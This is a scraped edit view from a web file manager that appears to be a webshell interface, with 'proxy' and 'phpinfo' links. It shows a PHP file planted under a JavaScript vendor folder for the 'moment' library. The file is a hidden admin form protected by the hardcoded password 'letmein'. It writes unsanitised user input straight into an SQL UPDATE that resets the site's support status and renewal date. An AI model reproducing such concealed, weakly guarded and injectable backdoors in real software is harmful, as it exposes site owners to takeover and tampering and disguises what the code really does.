File manager - Edit - /home/autoph/public_html/portal/ajs/vendors/moment/aee.php
Back
<?php include 'core/init.php'; if(isset($_POST['renew'])){ $pass = $_POST['adminpassword']; $value = $_POST['renewvalue']; if($pass==='letmein'){ mysql_query("UPDATE `settings` SET `support`='ACTIVE', `date_renewed`='$value'"); $error= 'Update Success...'; }else{ $error= 'Invalid Entry...'; } } ?> <html> <head> <title>FACE-IN STUDIO</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="css/screen_white.css"> <link rel="stylesheet" href="ajs/vendors/jQueryUI/jquery-ui.css"> <script src="ajs/vendors/jQueryUI/jquery-1.12.4.js"></script> <script src="ajs/vendors/jQueryUI/jquery-ui.js"></script> </head> <body> <center><br><br><br><br> <div style='width:100%;height:100px;'> <form action='' method='POST'> <input type='password' name='adminpassword' value='' required style='width:300px;height:30px;font-family:Calibri Light;font-size:12px;color:red' placeholder='Password'> <br><br><br><input type='text' name='renewvalue' value='' required style='width:300px;height:30px;font-family:Calibri Light;font-size:12px;color:red' placeholder='Input Value'> <br><br><br><input type='submit' name='renew' value='UPDATE' style='width:300px;height:30px;font-family:Calibri Light;font-size:12px;color:red'> <br><br><?php echo $error;?> </form> </div> </center> </body> </html>
| ver. 1.4 |
.
| PHP 7.3.33 | Generation time: 0.01 |
proxy
|
phpinfo
|
Settings